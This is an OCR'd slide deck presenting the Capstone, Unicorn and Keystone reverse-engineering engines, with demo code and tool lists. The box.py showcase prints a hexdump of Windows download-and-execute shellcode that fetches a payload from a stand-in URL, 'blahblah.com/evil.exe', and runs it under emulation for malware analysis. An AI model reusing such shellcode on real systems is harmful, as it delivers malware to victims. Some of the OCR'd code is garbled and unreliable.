Bio





# Almost Every Weekend

With VN Security since year 2009

- > CTF player
- Weekend gamer



### Most of the time

Running zxandora.com project.

- Soon
- Very Soon
- Brand New Online Sandbox



### Once a year

Hack in The Box Crew

- Good friends
- CTF CTF and CTF

### About Me



- > 2008, Hack In The Box CTF Winner
- > 2010, Hack In The Box Speaker, Malaysia
- > 2012, Codegate Speaker, Korea
- > 2015, VXRL Speaker, Hong Kong
- > 2015, HITCON CTF, Prequal Top 10
- > 2016, Codegate CTF, Prequal Top 5
- > 2016, Qcon Speaker, Beijing

- OSX, Local Privilege Escalation
- Code commit for metasploit 3
- Solution States Stat
- > Metasploit module
- Linux Randomization Bypass
- http://www.githiub.com/xwings/tuya
- ⇒ 微博: @kaijern

# vnsecurity.net

### Introduction



### **VN Security**

- > Active CTF Player (CLGT)
- > Active speaker at conferences
  - Blackhat USA
  - > Tetcon
  - > Hack In The Box
  - > Xcon

- Our Tools
  - > PEDA
  - Unicorn/ Capstone/ Keystone
  - > Xandora
  - OllyDbg, Catcha!
  - > ROPEME

### Nations

- Vietnamese
- Malaysian
- Singaporean

### Nguyen Anh Quynh

- Security Researcher
- Active speaker at conferences
  - Blackhat USA
  - Syscan
  - Hack In The Box
  - > Xcon

- Research Topics
  - Emulators
  - Virtualization
  - Binary Analysis
  - Tools for Malware Analysis

### When gdb meets peda

#### **GDB**

```
(qdb) disassemble
Dump of assembler code for function main:
0x0000000000040058c <main+0>:
                                push
                                      %rbp
0x0000000000040058d <main+1>:
                                       %rsp,%rbp
0x00000000000400590 <main+4>:
                                       $0x10,%rsp
0x00000000000400594 <main+8>:
                                       $0x4.%edi
0x000000000000400599 <main+13>:
                               callq 0x4004a8 < init+56>
0x0000000000040059e <main+18>:
                                       %rax,0xffffffffffffff(%rbp)
0x000000000004005a2 <main+22>:
                                      $0x0,0xffffffffffffffc(%rbp)
0x000000000004005a9 <main+29>:
                                      0xffffffffffffffc(%rbp),%eax
0x000000000004005ac <main+32>:
0x000000000004005ae <main+34>:
                                       $0x2,%rax
0x000000000004005b2 <main+38>:
                                      %rax,%rdx
0x000000000004005b5 <main+41>:
                                      0xffffffffffffff(%rbp),%rdx
0x000000000004005b9 <main+45>:
                                      0xffffffffffffffc(%rbp),%eax
0x000000000004005bc <main+48>:
                                      %eax.(%rdx)
0x000000000004005be <main+50>:
                                      0xffffffffffffffc(%rbp),%eax
0x000000000004005c1 <main+53>:
0x000000000004005c3 <main+55>:
                               shl
                                       $0x2,%rax
0x000000000004005c7 <main+59>:
                                      0xffffffffffffff(%rbp),%rax
0x000000000004005cb <main+63>:
                                       (%rax),%edx
0x00000000004005cd <main+65>:
                                      0xffffffffffffffc(%rbp),%esi
0x000000000004005d0 <main+68>:
                                       $0x4006dc.%edi
0x000000000004005d5 <main+73>:
                                       $0x0.%eax
0x000000000004005da <main+78>:
                                callq 0x4004b8 < init+72>
                                      $0x1,0xffffffffffffffc(%rbp)
0x000000000004005df <main+83>:
0x000000000004005e3 <main+87>:
                                      0x4005a9 <main+29>
End of assembler dump.
(gdb)
```



#### PEDA

```
peda$ start
AX: Oxbffff7f4 --> Oxbfffff916 ("/root/a.out")
BX: 0xb7fcbff4 --> 0x155d7c
CX: 0xd5eeaa03
DX: 0x1
SI: 0x0
DI: 0x0
BP: Oxbfffff748 --> Oxbfffff7c8 --> OxO
SP: 0xbfffff748 --> 0xbfffff7c8 --> 0x0
EIP: 0x80483e7 (<main+3>: and esp,0xffffffff0)
SFLAGS: 0x200246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
  0x80483e3 <frame dummy+35>: nop
  0x80483e4 <main>:
  0x80483e5 <main+1>: mov
> 0x80483e7 <main+3>: and
                              esp,0xfffffff0
  0x80483ea <main+6>: sub
                              esp,0x110
  0x80483f0 <main+12>: mov
                              eax, DWORD PTR [ebp+0xc]
  0x80483f3 <main+15>: add
                              eax.0x4
  0x80483f6 <main+18>: mov
                              eax, DWORD PTR [eax]
0000| 0xbffff748 --> 0xbffff7c8 --> 0x0
0004| 0xbfffff74c --> 0xb7e8cbd6 (< libc start main+230>:
                                                                      DWORD PTR [6
0008| 0xbfffff750 --> 0x1
0012| 0xbfffff754 --> 0xbfffff7f4 --> 0xbffff916 ("/root/a.out")
0016| 0xbffff758 --> 0xbffff7fc --> 0xbffff922 ("SHELL=/bin/bash")
0020| 0xbfffff75c --> 0xb7fe1858 --> 0xb7e76000 --> 0x464c457f
0024| 0xbffff760 --> 0xbffff7b0 --> 0x0
0028| 0xbfffff764 --> 0xfffffffff
Legend: code, data, rodata, value
Temporary breakpoint 1, 0x080483e7 in main ()
```

# Why KCON

### Fake Websites





# What Are These Things

### What Is Disassembler





- From binary to assembly code
- Core part of all binary analysis/ reverse engineering / debugger and exploit development
- Disassembly framework (engine/library) is a lower layer in stack of architecture

#### **Example**

- 01D8 = ADD EAX,EBX (x86)
- 1169 = STR R1,[R2] (ARM's Thumb)



### What Is Emulator



- Software only CPU Emulator
- Core focus on CPU operations.
- Design with no machine devices
- Safe emulation environment
- Where else can we see CPU emulator. Yes, Antivirus

#### **Example**

- 01D1 = add eax,ebx (x86)
  - Load eax & ebx register
  - Add value of eax & ebx then copy the result to eax
  - Update flag OF, SF, ZF, AF, CF, PF accordingly



### What Is Assembler



- From assembly to machine code
- Support high level concepts such as macro, functions and etc.
- Dynamic machine code generation

### **Example**

- ADD EAX,EBX = 01D8 (x86)
- STR R1,[R2] = 1169 (ARM's Thumb)



# Where are we currently





| > | CEnigma |
|---|---------|
| > | Unicorn |

Cerbero Profiler

> Shwass

CryptoShark

Rekall

Nrop

> CEbot

Ropper

> Inficere

Qira

> IIIdb-capstone-arm

> Camal

Snowman

Pwntools

Capstone-js

Radare2

X86dbg

Bokken

ELF Unstrip Tool

Pyew

Concolica

> Webkitties

Binjitsu

WinAppDbg

Memtools Vita

Malware\_config\_parsers

Nightmare

Rop-tool

> PowerSploit

BARF

JitAsmOllyCapstone

MachOview

> rp++

Catfish

PackerId

RopShell

Binwalk

Vitasploit

Volatility Plugins

> ROPgadget

The-Backdoor-Factory

Xipiter Toolkit

MPRESS dumper

PowerShellArsenal

JSoS-Module-Dump

Pwndbg

> Frida

Sonare

> PyReil

Lisa.py

> Cuckoo

> PyDA

ARMSCGen

Many Other More





- UniDOS: Microsoft DOS emulator.
- Radare2: Unix-like reverse engineering framework and commandline tools.
- Usercorn: User-space system emulator.
- Unicorn-decoder: A shellcode decoder that can dump self-modifying-code.
- Univm: A plugin for x64dbg for x86 emulation.
- > PyAna: Analyzing Windows shellcode.
- GEF: GDB Enhanced Features.
- > Pwndbg: A Python plugin of GDB to assist exploit development.
- Eli.Decode: Decode obfuscated shellcodes.
- July IdaEmu: an IDA Pro Plugin for code emulation.

- Roper: build ROP-chain attacks on a target binary using genetic algorithms.
- Sk3wlDbg: A plugin for IDA Pro for machine code emulation.
- Angr: A framework for static & dynamic concolic (symbolic) analysis.
- Cemu: Cheap EMUlator based on Keystone and Unicorn engines.
- ROPMEMU: Analyze ROP-based exploitation.
- BroIDS\_Unicorn: Plugin to detect shellcode on Bro IDS with Unicorn.
- > UniAna: Analysis PE file or Shellcode (Only Windows x86).
- > ARMSCGen: ARM Shellcode Generator.
- TinyAntivirus: Open source Antivirus engine designed for detecting & disinfecting polymorphic virus.
- Patchkit: A powerful binary patching toolkit.





- Keypatch: IDA Pro plugin for code assembling & binary patching.
- Radare2: Unix-like reverse engineering framework and commandline tools.
- > GEF: GDB Enhanced Features.
- Ropper: Rop gadget and binary information tool.
- Cemu: Cheap EMUlator based on Keystone and Unicorn engines.
- > Pwnypack: Certified Edible Dinosaurs official CTF toolkit.
- Keystone.JS: Emscripten-port of Keystone for JavaScript.
- Usercorn: Versatile kernel+system+userspace emulator.
- x64dbg: An open-source x64/x32 debugger for windows.
- Liberation: a next generation code injection library for iOS cheaters everywhere.

- Strongdb: GDB plugin for Android debugging.
- AssemblyBot: Telegram bot for assembling and disassembling on-the-go.
- demovfuscator: Deobfuscator for movfuscated binaries.
- > Dash: A simple web based tool for working with assembly language.
- ARMSCGen: ARM Shellcode Generator.
- Asm\_Ops: Assembler for IDA Pro (IDA Plugin).
- Binch: A lightweight ELF binary patch tool.
- Metame: Metamorphic code engine for arbitrary executables.
- > Patchkit: A powerful binary patching toolkit.
- Pymetamorph: Metamorphic engine in Python for Windows executables.

# Born of The Trinity

# Fundamental Frameworks for Reversing

A

- Components for a complete RE framework
- Interchange between assembler and disassembler
- A full CPU emulator always help when comes with obfuscated code



# Capstone Engine

NGUYEN Anh Quynh <aquynh -at- gmail.com>

http://www.capstone-engine.org

# What's Wrong with Current Disassembler



| Features             | Distorm3         | BeaEngine | Udis86 | Libopcode |
|----------------------|------------------|-----------|--------|-----------|
| X86 Arm              | √ X              | √ X       | √X     | √  √ 1    |
| Linux Windows        | 11               | 11        | 11     | √ X       |
| Python Ruby bindings | √ X <sup>2</sup> | √ X       | √ X    | √ X       |
| Update               | X                | ?         | X      | X         |
| License              | GPL              | LGPL3     | BSD    | GPL       |

- Nothing works even up until 2013 (First release of Capstone Engine)
- Looks like no one take charge
- Industry stays in the dark side

### What do we need?

- Multiple archs: x86, ARM+ ARM64 + Mips + PPC and more
- Multiple platform: Windows, Linux, OSX and more
- Multiple binding: Python, Ruby, Java, C# and more























- Clean, simple, intuitive & architecture-neutral API
- Provide break-down details on instructions
- Friendly license: Not GPL

### Lots of Work!



- Multiple archs: x86, ARM
- Actively maintained & update within latest arch's change
- Multiple platform: Windows, Linux
- Understanding opcode, Intel x86 it self with 1500++ documented instructions



- Support python and ruby as binding languages
- Single man show
- > Target finish within 12 months

## A Good Disassembler



- > Multiple archs: x86, ARM
- Actively maintained & update within latest arch's change
- Multiple platform: Windows, Linux



- Support python and ruby as binding languages
- Friendly license: BSD
- Easy to setup

# Not Reinventing the Wheel





- Open source project compiler
- Sets of modules for machine code representing, compiling, optimizing
- Backed by many major players: AMD, Apple, Google, Intel, IBM, ARM, Imgtec, Nvidia, Qualcomm, Samsung, etc
- > Incredibly huge (compiler) community around.

### Fork from LLVM







- Multiple architectures ready
- In-disassembler (MC module)
  - Only, Only and Only build for LLVM
  - > actively maintained by the original vendor from the arch building company (eg, x86 from intel)
- Very actively maintained & updated by a huge community





#### Issues

- Cannot just reuse MC as-is without huge efforts.
  - > LLVM code is in C++, but we want C code.
  - Code mixed like spaghetti with lots of LLVM layers, not easy to take out
  - Need to build instruction breakdown-details ourselves.
  - Expose semantics to the API.
  - Not designed to be thread-safe.
  - Poor Windows support.
- Need to build all bindings ourselves.
- Keep up with upstream code once forking LLVM to maintain ourselves.

#### **Solutions**

- Fork LLVM but must remove everything we do not need
- > Replicated LLVM's MC
  - Build around MC and not changing MC
  - Replace C++ with C
- Extend LLVM's MC
  - Isolate some global variable to make sure thread-safe
- Semantics information from TD file from LLVM
- cs\_inn structure
  - Keep all information and group nicely
  - Make sure API are arch-independent

### Capstone is not LLVM



### **More Superiors**

- > Zero dependency
- Compact in size
- More than assembly code
- > Thread-safe design
- Able to embed into restricted firmware OS/ Environments
- Malware resistance (x86)
- Optimized for reverse engineers
- More hardware mode supported:- Big-Endian for ARM and ARM64
- More Instructions supported: 3DNow (x86)

#### **More Robust**

- Cannot always rely on LLVM to fix bugs
  - Disassembler is still conferred secondsclass LLVM, especially if does not affect code generation
  - May refuse to fix bugs if LLVM backed does not generate them (tricky x86 code)
- But handle all comer case properly is Capstone first priority
  - > Handle all x86 malware ticks we aware of
  - LLVM could not care less

### Demo



```
1 /* test1.c */
 3 #include <stdio.h>
 4 #include <inttypes.h>
 6 #include <capstone/capstone.h>
 8 #define CODE "\x55\x48\x8b\x05\xb8\x13\x00\x00"
10 int main(void)
11 (
12 osh handle;
13 cs insn *insn;
14 size t count;
15
16 if (cs open(CS ARCH X86, CS MODE 64, &handle) |= CS ERR OR)
17 return -1;
18 count = cs disasm(handle, CODE, sizeof(CODE)-1, 0x1000, 0, &insn);
19 if (count > 0) {
20
       size t j;
21
       for (j = 0; j < count; j++) (
22
           printf("0x%"PRIx64":\t%s\t\t%s\n", insn[j].address, insn[j].mnemoni
23
                   insn[j].op str);
24
25
26
       ds free(insn, dount);
27 } else
28
       printf("ERROR: Failed to disassemble given code!\n");
29
30 cs_close(&handle);
31
32
      return 0;
33 )
```

```
1 # test1.py
2 from capstone import *
3
4 CODE = b"\x55\x48\x8b\x05\xb8\x13\x00\x00"
5
6 md = Cs(CS_ARCH_X86, Cs_MODE_64)
7 for i in md.disasm(CODE, 0x1000):
8     print("0x%x:\t%s\t%s\t%s" %(i.address, i.mnemonic, i.op_str))
```

```
$ python test1.py

0x1000: push    rbp

0x1001: mov rax, qword ptr [rip + 0x13b8]
```

### Showcase: x64dbg







# Unicorn Engine

NGUYEN Anh Quynh <aquynh -at- gmail.com> DANG Hoang Vu <danghvu -at- gmail.com>

http://www.unicorn-engine.org

# What's Wrong with Current Emulator



| Features    | libemu | PyEmu | IDA-x86emu | libCPU |
|-------------|--------|-------|------------|--------|
| Multi-arch  | X      | X     | X          | X 1    |
| Updated     | X      | X     | X          | X      |
| Independent | X 2    | X 3   | X 4        | 1      |
| JIT         | X      | X     | X          | 1      |

- Nothing works even up until 2015 (First release of Unicorn Engine)
- Limited bindings
- Limited functions, limited architecture

### What Do We Need?



| Features    | libemu | PyEmu | IDA-x86emu | libCPU   | Unicorn  |
|-------------|--------|-------|------------|----------|----------|
| Multi-arch  | Χ      | Χ     | X          | Χ        | <b>√</b> |
| Updated     | X      | X     | X          | X        | <b>√</b> |
| Independent | X      | X     | X          | <b>√</b> | <b>√</b> |
| JIT         | X      | X     | X          | <b>√</b> | <b>√</b> |

- Multiple archs: x86, x86\_64, ARM+ ARM64 + Mips + PPC
- Multiple platform: Windows, Linux, OSX, Android and more
- Multiple binding: Python, Ruby, Java, C# and more























- > Pure C implementation
- Latest and updated architecture
- With JIT compiler technique
- Instrumentation eg. F7, F8

### Lots of Work!



- Multiple archs: x86, ARM
- Actively maintained & update within latest arch's change
- Multiple platform: Windows, Linux
- Understanding opcode, Intel x86 it self with 1500++ documented instructions



- Support python and ruby as binding languages
- Single man show
- > Target finish within 12 months

### A Good Emulator



- Multiple archs: x86, x86\_64, ARM, ARM64, Mips and more
- Actively maintained & update within latest arch's change
- Multiple platform: Windows, Linux, OSX, Android and more



- Code in pure C
- Support python and ruby as binding languages
- > JIT compiler technique
- Instrumentation at various level
  - Single step
  - Instruction
  - Memory Access

# Not Reinventing the Wheel





- Open source project on system emulator
- Very huge community and highly active
- Multiple architecture: x86, ARM, ARM64, Mips, PowerPC, Sparc, etc (18 architectures)
- Multiple platform: \*nix and Windows

### Fork from QEMU







- Support all kind of architectures and very updated
- Already implemented in pure C, so easy to implement Unicorn core on top
- Already supported JIT in CPU emulation, optimization on of of JIT
- Are we done?



#### Issues 1

- Not just emulate CPU, but also device models & ROM/BIOS to fully emulate physical machines
- Qemu codebase is huge and mixed like spaghetti
- Difficult to read, as contributed by many different people

#### **Solutions**

- Keep only CPU emulation code & remove everything else (devices, ROM/BIOS, migration, etc)
- Keep supported subsystems like Qobject, Qom
- Rewrites some components but keep CPU emulation code intact (so easy to sync with Qemu in future)

#### Issues 2

- Set of emulators for individual architecture
  - Independently built at compile time
  - All archs code share a lot of internal data structures and global variables
- Unicorn wants a single emulator that supports all archs

- Isolated common variables & structures
  - Ensured thread-safe by design
- Refactored to allow multiple instances of Unicorn at the same time Modified the build system to support multiple archs on demand

# A

#### Issues 3

- Instrumentation for static compilation only
- JIT optimizes for performance with lots of fast-path tricks, making code instrumenting extremely hard

#### **Solutions**

- Build dynamic fine-grained instrumentation layer from scratch Support various levels of instrumentation
  - Single-step or on particular instruction (TCG level)
  - Instrumentation of memory accesses (TLB level)
  - Dynamically read and write register
  - Handle exception, interrupt, syscall (archlevel) through user provided callback.

#### Issues 4

- Objects is open (malloc) without closing (freeing) properly everywhere
- Fine for a tool, but unacceptable for a framework

- Find and fix all the memory leak issues
- Refactor various subsystems to keep track and cleanup dangling pointers

#### Unicorn Engine is not QEMU





- Independent framework
- Much more compact in size, lightweight in memory
- > Thread-safe with multiple architectures supported in a single binary Provide interface for dynamic instrumentation
- More resistant to exploitation (more secure)
  - > CPU emulation component is never exploited!
  - Easy to test and fuzz as an API.

#### Demo

```
1 #include <unicorn/unicorn.h>
3 // code to be emulated
 4 #define X86 CODE32 "\x41\x4a" // INC ecx; DEC edx
6 // memory address where emulation starts
7 #define ADDRESS 0x1000000
9 int main(int argo, char **argv, char **envp)
10 (
11 Uc engine *uc;
12 on arr errs
13 int r eck = 0x1234; // ECX register
14 int r edx = 0x7890: // EDX register
15
16 printf("Emulate i386 code\n");
17
18 // Initialize emulator in X86-32bit mode
19 err - uc open(UC ARCH X86, UC MODE 32, &oc);
20 if (err i= DC ERR OK) (
21 printf("Failed on uc open() with error returned: &u\n", err);
22 return -1;
23
24
25 // map 2MB memory for this emulation
26 uc mem map(uc, ADDRESS, 2 * 1024 * 1024, UC PROT ALL);
27
28 // write machine code to be emulated to memory
29 if (uc men write/uc, ADDRESS, X86 CODE32, mixeof(X86 CODE32) - 1)) /
30 printf("Failed to write emulation code to memory, quitt'n");
31 return -1;
32
33
34 // initialize machine registers
35 up rag write(up, DC X86 REG ECK, &r eck);
36 no reg write(no, UC X86 REG EDX, &r edx);
37
38 // emulate code in infinite time & unlimited instructions
39 erreud emu start(ud, ADDRESS, ADDRESS + sizeof(X86_CODE32) - I, 0, 0
40 if (err) {
41 printf("Failed on uc_emu_start() with error returned %u: %s\n".
42
       err, uc strerror(err));
43 )
44
45 // now print out some registers
46 printf("Emulation done. Below is the CPU context\n");
48 uc req read(uc, UC X86 REG ECX, &r ecx);
49 uc red read(uc, UC X86 REG EDX, &r edx);
50 printf(">>> ECX = 0x4x\n", r ecx);
51 printf(">>> EDX = 0x%x\n", r_edx);
53 nc close(uc);
54
55 return 0:
56 }
```

```
% make
cc test1.c -L/usr/local/Cellar/glib/2.44.1/lib -L/usr/local/opt/gettext/2
% ./test1
Emulate 1386 code
Emulation dome. Below is the CPU context
>>> ECX = 0x1235
>>> ECX = 0x285f
```

```
R
```

```
1 from future import print function
 2 from unicorn import *
 3 from unicorn.x85 const import *
 5 # code to be emulated
 6 X86 CODE32 = b"\x41\x4a" # INC ecx; DEC edx
 8 # memory address where emulation starts
 9 ADDRESS = 0x1000000
11 print("Emulate i386 code")
12 try:
13
       # Initialize emulator in X86-32bit mode
14
       mu = Uc (UC ARCH X86, UC MODE 32)
15
16
       # map 2MB memory for this emulation
17
       mu.mem map(ADDRESS, 2 * 1024 * 1024)
18
19
       # write machine code to be emulated to memory
20
       mu.mem write(ADDRESS, X86_CODE32)
21
22
       # initialize machine registers
23
       mu.reg write(UC X86 REG ECX, 0x1234)
24
       mu.reg_write(UC_X86_REG_EDX, 0x7890)
25
26
       # emulate code in infinite time & unlimited instructions
27
       mu.emu start(ADDRESS, ADDRESS + 1en(X86 CODE32))
28
29
       # now print out some registers
30
       print("Emulation done. Below is the CPU context")
31
32
       r ecx = mu.reg read(UC X86 REG ECX)
33
       r edx = mu.reg read(UC X86 REG EDX)
34
       print(">>> ECX = 0x%x" %r ecx)
35
       print(">>> EDX = 0x%x" %r edx)
36
37 except UcError as e:
       print("ERROR: %s" % e)
$ python test1.py
Emulate i386 code
Emulation done. Below is the CPU context
>>> ECX = 0x1235
>>> EDX = 0x788f
```

#### Showcase: box.py

```
(20:54:08):xwings@kali32:<~/box>
(4)$ hexdump -C samples/UrlDownloadToFile.sc
00000000 50 90 50 90 50 90 50 90 90 90 90 90 90 90 90 1P.P.P.P.......
00000010 e9 fb 00 00 00 5f 64 a1 30 00 00 00 8b 40 0c 8b |...._d.0....@..|
00000020 70 1c ad 8b 68 20 80 7d 0c 33 74 03 96 eb f3 8b
00000030 68 08 8b f7 6a 04 59 e8 8f 00 00 00 e2 f9 68 6f | h...j.Y......ho|
                                                      In..hurlmT....y.I
00000040 6e 00 00 68 75 72 6c 6d 54 ff 16 8b e8 e8 79 00
00000050 00 00 8b d7 47 80 3f 00 75 fa 47 57 47 80 3f 00
                                                       1....G.?.u.GWG.?.
000000000 75 fa 8b ef 5f 33 c9 81 ec 04 01 00 00 8b dc 51
00000070 52 53 68 04 01 00 00 ff 56 0c 5a 59 51 52 8b 02 | IRSh....V.ZYOR...|
000000080 53 43 80 3b 00 75 fa 81 7b fc 2e 65 78 65 75 03 | ISC.;.u..{..exeu.
00000090 83 eb 08 89 03 c7 43 04 2e 65 78 65 c6 43 08 00 |.....C..exe.C..|
000000a0 5b 8a c1 04 30 88 45 00 33 c0 50 50 53 57 50 ff | [...0.E.3.PPSWP.]
000000b0 56 10 83 f8 00 75 06 6a 01 53 ff 56 04 5a 59 83 |V...u.j.S.V.ZY.|
000000c0 c2 04 41 80 3a 00 75 b4 ff 56 08 51 56 8b 75 3c |...A.:.u..V.QV.u<|
000000d0 8b 74 35 78 03 f5 56 8b 76 20 03 f5 33 c9 49 41 | .t5x..V.v ..3.IA|
000000e0 ad 03 c5 33 db 0f be 10 38 f2 74 08 c1 cb 0d 03 | ...3....8.t.....|
0000000f0 da 40 eb f1 3b 1f 75 e7 5e 8b 5e 24 03 dd 66 8b |.@..;.u.^.^$..f.|
00000110 e8 00 ff ff ff 8e 4e 0e ec 98 fe 8a 0e 7e d8 e2 |.....N.....~..|
00000120 73 33 ca 8a 5b 36 1a 2f 70 64 45 62 57 00 68 74 |s3..[6./pdEbW.htl
00000130 74 70 3a 2f 2f 62 6c 61 68 62 6c 61 68 2e 63 6f | tp://blahblah.col
00000140 6d 2f 65 76 69 6c 2e 65 78 65 00 00 00 00 00 lm/evil.exe.....
00000150
```



```
f = open(fname, 'rb')
def disas(code, address)
  md = Cs(CS_ARCH_X86, CS_MODE_32)
  insn = md.disasm(str(code), address)
      print ('Exact As\tas' %(i.address, i.mnemonic, i.op_str))
       disas(code, address)
  esp = uc.reg read(UC X86 REG ESP)
  print(">> ERROR: unmapped memory access at 0x0x" haddr)
  usage = "Usage: Aprog [options] filename"
parser = OptionParser(usage)
                    action="store true", dest="debug")
  (options, args) = parser.parse_args()
      HE - HETHE ARCH YES. HE MODE 32)
       uc.hook_add(UC_HOOK_MEM_UNMAPPED, hook_mem_error)
       uc.reg write(UC X86 REG ESP, STACK ADDR + 0x3000)
       UC, reg Write(UC X86 REG EBP, STACK ADDR + 8x3888)
      uc.mem map(CODE ADDR, CODE SIZE)
       uc.mem_write(CODE_ADDR, shellcode)
       setup oft segment(uc. GOT ADDR. GOT LIMIT, UC X86 REG FS. 1. FS ADDR. FS SIZE, init = True)
       setup win32 xp(uc, FS_ADDR)
```

### Keystone Engine

NGUYEN Anh Quynh <aquynh -at- gmail.com>

http://www.keystone-engine.org

#### What's Wrong with Assembler





- Nothing is up to our standard, even in 2016!
  - Yasm: X86 only, no longer updated
  - Intel XED: X86 only, miss many instructions & closed-source
  - Use assembler to generate object files
  - Other important archs: Arm, Arm64, Mips, PPC, Sparc, etc?

#### What do we need?



- Multiple archs: x86, ARM+ ARM64 + Mips + PPC and more
- Multiple platform: Windows, Linux, OSX and more
- Multiple binding: Python, Ruby, Java, C# and more























- Clean, simple, intuitive & architecture-neutral API
- Provide break-down details on instructions
- Friendly license: BSD

#### Lots of Work!



- Multiple archs: x86, ARM
- Actively maintained & update within latest arch's change
- Multiple platform: Windows, Linux
- Understanding opcode, Intel x86 it self with 1500++ documented instructions



- Support python and ruby as binding languages
- Single man show
- > Target finish within 12 months

#### A Good Assembler



- Multiple archs: x86, ARM
- Actively maintained & update within latest arch's change
- Multiple platform: Windows, Linux



- Support python and ruby as binding languages
- Friendly license (BSD)
- Easy to setup

#### Not Reinventing the Wheel





- Open source project compiler
- > Sets of modules for machine code representing, compiling, optimizing
- Backed by many major players: AMD, Apple, Google, Intel, IBM, ARM, Imgtec, Nvidia, Qualcomm, Samsung, etc
- Incredibly huge (compiler) community around.

#### Fork from LLVM







- Multiple architectures ready
- In-build assembler (MC module)
  - Only, Only and Only build for LLVM
  - actively maintained
- Very actively maintained & updated by a huge community



#### Issue 1

- LLVM not just assembler, but also disassembler, bitcode, InstPrinter, Linker Optimization, etc
- LLVM codebase is huge and mixed like spaghetti

#### **Solutions**

- Keep only assembler code & remove everything else unrelated
- Rewrites some components but keep AsmParser,
   CodeEmitter & AsmBackend code intact (so easy to sync with LLVM in future, e.g. update)
- Keep all the code in C++ to ease the job (unlike Capstone)
  - No need to rewrite complicated parsers
  - No need to fork Ilvm-tblgen

#### Issue 2

- LLVM compiled into multiple libraries
  - Supported libs
  - > Parser
  - TableGen and etc.
- Keystone needs to be a single library

- Modify linking setup to generate a single library
  - libkeystone.[so, dylib] + libkeystone.a
  - keystone.dll + keystone.lib



#### Issue 3

- Relocation object code generated for linking in the final code generation phase of compiler
- Ex on X86:
  - $\rightarrow$  inc [\_var1]  $\rightarrow$  0xff, 0x04, 0x25, A, A, A, A

#### **Solutions**

- Make fixup phase to detect & report missing symbols
- Propagate this error back to the top level API ks\_asm()

#### Issue 4

Ex on ARM: blx 0x86535200 → 0x35, 0xf1, 0x00, 0xe1

- ks\_asm() allows to specify address of first instruction
- Change the core to retain address for each statement
- Find all relative branch instruction to fix the encoding according to current & target address



#### Issue 5

- Ex on X86: vaddpd zmm1, zmm1, zmm1, x → "this is not an immediate"
- Returned Ilvm\_unreachable() on input it cannot handle

#### **Solutions**

- Fix all exits & propagate errors back to ks\_asm()
  - > Parse phase
  - Code emit phase

#### Issue 6

- LLVM does not support non-LLVM syntax
  - We want other syntaxes like Nasm, Masm, etc
- Bindings must be built from scratch
- Keep up with upstream code once forking LLVM to maintain ourselves

- Extend X86 parser for new syntaxes: Nasm, Masm, etc
- Built Python binding
- Extra bindings came later, by community: NodeJS, Ruby, Go, Rust, Haskell & OCaml
- Keep syncing with LLVM upstream for important changes & bug-fixes

#### Keystone is not LLVM



#### Fork and Beyond

- Independent & truly a framework
  - Do not give up on bad-formed assembly
- Aware of current code position (for relative branches)
- > Much more compact in size, lightweight in memory
- Thread-safe with multiple architectures supported in a single binary More flexible: support X86 Nasm syntax
- Support undocumented instructions: X86
- Provide bindings (Python, NodeJS, Ruby, Go, Rust, Haskell, OCaml as of August 2016)



#### Demo



```
1 /* test1.c */
 2 #include <stdio.h>
 3 #include <keystone/keystone.h>
 5 // separate assembly instructions by ; or \n
 6 #define CODE "INC ecx: DEC edx"
 8 int main(int argo, char **argv)
       ks engine *ks;
     ks err err;
     size t count;
      unsigned char *encode;
       size t size;
       err = ks open(KS ARCH X86, KS MODE 32, &ks);
17
       if (err != KS_ERR_OE) (
18
       printf("ERROR: failed on ks_open(), quit\n");
19
           return -1;
20
21
22
       if (ks asm(ks, CODE, O, &encode, &size, &count) != KS ERR OK) {
23
          printf("ERROR: ks_asm() failed & count = %lu, error = %u\n",
24
                          count, ks srrno(ks));
       } else {
26
          size t in
27
           printf("ts = ", CODE);
29
           for (i = 0; i < size; i++) (
30
               printf("%02x ", encode(i));
31
32
           printf("\n");
33
           printf("Compiled: %lu bytes, statements: %lu\n", size, count);
34
35
36
       // NOTE: free encode after usage to avoid leaking memory
37
       ks_free(encode);
38
39
       // close Keystone instance when done
       ks close(ks);
41
       return 0;
43 )
```

```
% make
cc -o test1 test1.c -lkeystone -lstdc++ -lm

% ./test1
INC ecx; DEC edx = 41 4a
Compiled: 2 bytes, statements: 2
```

```
1 from keystone import *
2
3 # separate assembly instructions by ; or \n
4 CODE = b"INC ecx; DEC edx"
5
6 try:
7 # Initialize engine in X86-32bit mode
8 ks = Ks(KS_ARCH_X86, KS_MODE_32)
9 encoding, count = ks.asm(CODE)
10 print("%s = %s (number of statements: %u)" %(CODE, encoding, count))
11 except KsError as e:
12 print("ERROR: %s" %e)
```

```
$ ./test1.py
INC ecx; DEC edx = [65, 74] (number of statements: 2)
```

#### Show Case: metame

89c7

0x080cbda6

mov edi, eax



```
Before
                                                                                    After
                eb10
                                                                                    eb10
                                                                                                  jmp 0x10012e1b
                              imp 0x10012e1b
                                                                      0x10012e09
                8b542410
                              mov edx, dword [esp + 0x10]
                                                                                    8b542410
                                                                                                 mov edx, dword [esp + 0x10]
                8d4bff
                              lea ecx, [ebx - 1]
                                                                                    8d4bff
                                                                                                 lea ecx, [ebx - 1]
  0x10012e12
  0x10012e13
                8bce
                              mov ecx, esi
                e807eeffff
  0x10012e16
                                                                                                  pop ecx
                                                                                    e807eeffff
                8b7c2454
                              mov edi, dword [esp + 0x54]
                bd01000000
                                                                                    8b7c2454
                                                                                                 mov edi, dword [esp + 0x54]
                              mov ebp, 1
  0x10012e24
                3bdf
                                                                                    9c
                                                                                                 pushfd
                              jae 0x10012e49
                                                                                    31ed
                8d9b00000000
                              lea ebx, [ebx]
                                                                                                  inc ebp
                                                                                    9d
                                                                                                  popfd
                    eb0d
  0x080cbd91
                                      jmp 0x80cbda0
                                                                   = 0x080cbd91
                                                                                        eb0d
                                                                                                          jmp 0x80cbda0
  0x080cbd93
                    90
                                                                  ==< 0x080cbd93
                                                                                        eb01
                                                                                                          jmp 0x80cbd96
                    90
                                                                       0x080cbd95
  0x080cbd95
                     90
                                                                  --> 0x080cbd96
                                                                                        eb01
                                                                                                          jmp 0x80cbd99
  0x080cbd96
                    90
                                                                       0x080cbd98
                                                                                                         pop edx
  0x080cbd97
                    90
                                                                  ==< 0x080cbd99
                                                                                        eb01
                                                                                                          imp 0x80cbd9c
                    90
                                                                                                          pop edi
  0x080cbd98
                                                                       0x080cbd9b
  0x080cbd99
                    90
                                                                  --> 0x080cbd9c
                                                                                        eb01
                                                                                                          jmp 0x80cbd9f
  0x080cbd9a
                    90
                                                                      0x080cbd9e
                                                                                                          inc eax
                                                                                        90
  0x080cbd9b
                    90
